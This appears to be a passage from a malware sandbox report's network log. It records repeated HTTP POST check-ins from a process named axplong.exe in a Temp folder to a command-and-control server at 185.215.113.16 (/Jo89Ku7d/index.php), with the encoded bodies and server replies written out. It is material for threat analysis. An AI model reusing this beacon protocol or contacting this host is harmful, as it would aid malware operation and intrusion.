                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:50.675717115 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    42192.168.2.462801185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:50.799154997 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:51.523658991 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:51.531505108 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:51.774765015 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    43192.168.2.462802185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:51.905113935 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:52.628562927 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:52.631453991 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:52.860121012 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    44192.168.2.462803185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:52.968869925 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:53.698178053 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:53.699625969 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:53.929639101 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    45192.168.2.462804185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:54.046569109 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:54.745338917 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:54.746146917 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:54.971054077 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    46192.168.2.462805185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:55.093302011 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:55.843205929 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:55.844485044 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:56.087116957 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    47192.168.2.462806185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:56.203016043 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:56.902156115 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:56.903167963 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:57.127599001 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    48192.168.2.462807185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:57.294256926 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:58.009450912 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:58.013398886 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:58.241193056 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    49192.168.2.462808185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:58.358745098 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:59.068933010 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:59.069833994 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:59.292927980 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    50192.168.2.462809185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:59.405945063 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:06:00.154752970 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:06:00.197983027 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:06:00.427018881 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    51192.168.2.462810185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:06:00.562807083 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:06:01.278086901 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:06:01.278971910 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:06:01.509730101 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    52192.168.2.462811185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:06:01.626106024 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:06:02.344595909 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:06:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:06:02.347218990 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
